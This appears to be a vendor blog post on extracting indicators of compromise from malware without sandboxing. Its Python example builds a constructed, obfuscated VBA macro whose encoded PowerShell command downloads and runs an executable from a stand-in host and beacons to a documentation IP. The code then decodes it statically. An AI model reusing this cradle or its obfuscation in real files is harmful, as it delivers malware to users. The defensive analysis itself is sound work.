Let's start out by describing the problem, followed by our solution.
We need more than detection
We all know that a fast and effective response within the incident response cycle is key. Yes, speed matters, but so do diligence and depth of analysis. Today, dealing with malware is more than the binary question of whether a file is good or bad. First of all, there are many shades of grey. Secondly, a full understanding of the impact of a potential threat (why is it bad? what capabilities are present? what underlying network infrastructure is being used?) is vital to a complete IT security workflow. At the very minimum, an analysis system needs to be able to extract embedded Indicators of Compromise ("IOCs"), both for pre-emptive measures (blocking) and for detecting a potential breach that has already happened. Thus far, mostly due to heavy obfuscation and encryption, only actual execution of the malware (typically within an isolated environment / sandbox, also known as dynamic analysis) has been able to extract the key IOCs (e.g. network IPs, URLs, domains) on a consistent basis. However, standing up a scalable array of sandboxes in order to scan every file comes with a lot of overhead: maintaining an array of VM image snapshots and their security updates, filtering out the white noise generated by the guest OS itself, hardware requirements, limited throughput, and so on.
Why are IOCs important?
As mentioned, purely detecting malware is not enough. Only by uncovering the IOCs, which are often hidden behind many layers of obfuscation (e.g. an obfuscated VBA macro that calls PowerShell, which eventually downloads a file), does it become possible to perform better attribution and to understand the nature of an attack. Furthermore, IOCs lead to the detection of other potentially compromised endpoints and allow pre-emptive protection of assets, e.g. by blocking the underlying network IPs/domains in your firewall (thereby preventing data corruption and exfiltration).
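The layered case described above (VBA string building, a PowerShell `-EncodedCommand`, and finally the download URL) can often be peeled back statically, without running the document in a sandbox. The following is an added example and not FileScan.IO's code: it emulates only the handful of VBA string-building idioms (`Chr()`, `StrReverse()`, `&` concatenation and simple variable assignment) that the constructed sample uses, decodes the base64/UTF-16LE PowerShell command line, and then extracts URL, IP and domain IOCs from every recovered layer. The macro, the PowerShell cradle and the IOCs (`cdn-update.example.com`, `203.0.113.25`) are all constructed for the example from reserved documentation ranges, not taken from a real campaign.

```python
import base64
import re

# ---- Constructed sample (not real malware) ----------------------------------
# Stage 3: the command the macro ultimately runs. The URL and IP are the IOCs
# we want to recover without executing anything (RFC 2606 / RFC 5737 ranges).
PS_COMMAND = ("$u='http://cdn-update.example.com/upd/payload.exe';"
              "(New-Object Net.WebClient).DownloadFile($u,\"$env:TEMP\\svc.exe\");"
              "Start-Process \"$env:TEMP\\svc.exe\";"
              "Invoke-WebRequest http://203.0.113.25/beacon -UseBasicParsing")
# Stage 2: PowerShell's -EncodedCommand is base64 over UTF-16LE text.
PS_ENCODED = base64.b64encode(PS_COMMAND.encode("utf-16-le")).decode()
# Stage 1: a VBA macro that assembles the cradle from Chr() and StrReverse(),
# so that neither "powershell" nor the URL appears as a plain string on disk.
SAMPLE_VBA = f'''
Sub AutoOpen()
    Dim p As String, a As String, cmd As String
    p = StrReverse("llehsrewop")
    a = Chr(45) & Chr(101) & Chr(110) & Chr(99)
    cmd = p & " -nop -w hidden " & a & " " & "{PS_ENCODED}"
    CreateObject("WScript.Shell").Run cmd, 0
End Sub
'''

# ---- Layer 1: VBA string emulation ------------------------------------------
def eval_vba_expr(expr: str, env: dict) -> str:
    """Evaluate a VBA string expression made of literals, Chr()/ChrW(),
    StrReverse() over a literal, and variable references joined with '&'.
    Deliberately minimal: literals containing '&' or Chr(34) are not handled."""
    out = []
    for tok in expr.split("&"):
        tok = tok.strip()
        if (m := re.fullmatch(r'"((?:[^"]|"")*)"', tok)):
            out.append(m.group(1).replace('""', '"'))
        elif (m := re.fullmatch(r"Chr[W$]?\((\d+)\)", tok, re.I)):
            out.append(chr(int(m.group(1))))
        elif (m := re.fullmatch(r"StrReverse\((.+)\)", tok, re.I)):
            out.append(eval_vba_expr(m.group(1), env)[::-1])
        else:
            out.append(env.get(tok.lower(), ""))   # variable reference; unknown -> ""
    return "".join(out)

def emulate_vba_assignments(macro: str) -> dict:
    """Walk the macro top to bottom and resolve every `name = expr` into the
    string it would hold at run time (no control flow, no procedure calls)."""
    env = {}
    for raw in macro.splitlines():
        line = raw.strip()
        if line.lower().startswith(("if ", "for ", "dim ", "set ", "'")):
            continue
        if (m := re.match(r"(\w+)\s*=\s*(.+)$", line)):
            env[m.group(1).lower()] = eval_vba_expr(m.group(2), env)
    return env

# ---- Layer 2: PowerShell -EncodedCommand --------------------------------------
def decode_powershell_encodedcommand(cmd: str):
    """Reverse -EncodedCommand / -enc / -e (base64 of UTF-16LE); None if absent."""
    m = re.search(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

# ---- Layer 3: IOC extraction ---------------------------------------------------
URL_RE = re.compile(r"\bhttps?://[^\s'\"<>()]+", re.I)
IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")

def extract_iocs(text: str) -> dict:
    """Pull URLs, IPv4 addresses and URL host names out of a blob of text."""
    urls = sorted(set(URL_RE.findall(text)))
    hosts = {re.sub(r"^https?://", "", u, flags=re.I).split("/")[0].split(":")[0] for u in urls}
    ips = sorted(set(IPV4_RE.findall(text)) | {h for h in hosts if IPV4_RE.fullmatch(h)})
    domains = sorted(h.lower() for h in hosts if not IPV4_RE.fullmatch(h))
    return {"urls": urls, "ips": ips, "domains": domains}

def analyse_macro(macro: str) -> dict:
    """Peel the layers statically: VBA strings -> PowerShell command line ->
    decoded -EncodedCommand -> IOCs, keeping each recovered layer for the report."""
    env = emulate_vba_assignments(macro)
    layers = {"vba_strings": "\n".join(env.values())}
    for value in env.values():
        decoded = decode_powershell_encodedcommand(value)
        if decoded:
            layers["powershell_decoded"] = decoded
    iocs = {k: set() for k in ("urls", "ips", "domains")}
    for text in layers.values():
        for kind, values in extract_iocs(text).items():
            iocs[kind].update(values)
    return {"layers": layers, "iocs": {k: sorted(v) for k, v in iocs.items()}}

def defang(ioc: str) -> str:
    """Make an IOC safe to paste into a ticket or report (hxxp, [.])."""
    return re.sub(r"^http", "hxxp", ioc, flags=re.I).replace(".", "[.]")

if __name__ == "__main__":
    result = analyse_macro(SAMPLE_VBA)
    print("decoded:", result["layers"]["powershell_decoded"])
    for kind, values in result["iocs"].items():
        for value in values:
            print(f"{kind:8} {defang(value)}")
```

Real macros use far more idioms than the four emulated here (Replace(), Mid(), arithmetic on character codes, split strings across procedures), which is exactly why a production extractor needs a proper VBA emulator rather than regexes; the point of the example is that each layer (string assembly, encoded command line, plain URL) is individually cheap to reverse, and that the IOCs fall out without ever executing the document.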
Is sandboxing the silver bullet?
IOC Extraction Today
However, for a low volume of files (and for forensic purposes alike), sandboxing remains very useful. So how do we reduce the workload? Using white-/blacklists helps, but only so much, as they are usually keyed on the file hash, and modern malware campaigns are run with thousands of automatically generated samples that are fresh and unknown. So we had to conclude, as is often the case in IT security: there is no silver bullet.
Rapid IOC Feedback Loop
FileScan.IO is a next-gen malware assessment platform with the following emphasis:
- Providing rapid and in-depth threat analysis services capable of processing files at very high volume
- A focus on Indicator-of-Compromise (IOC) extraction and actionable context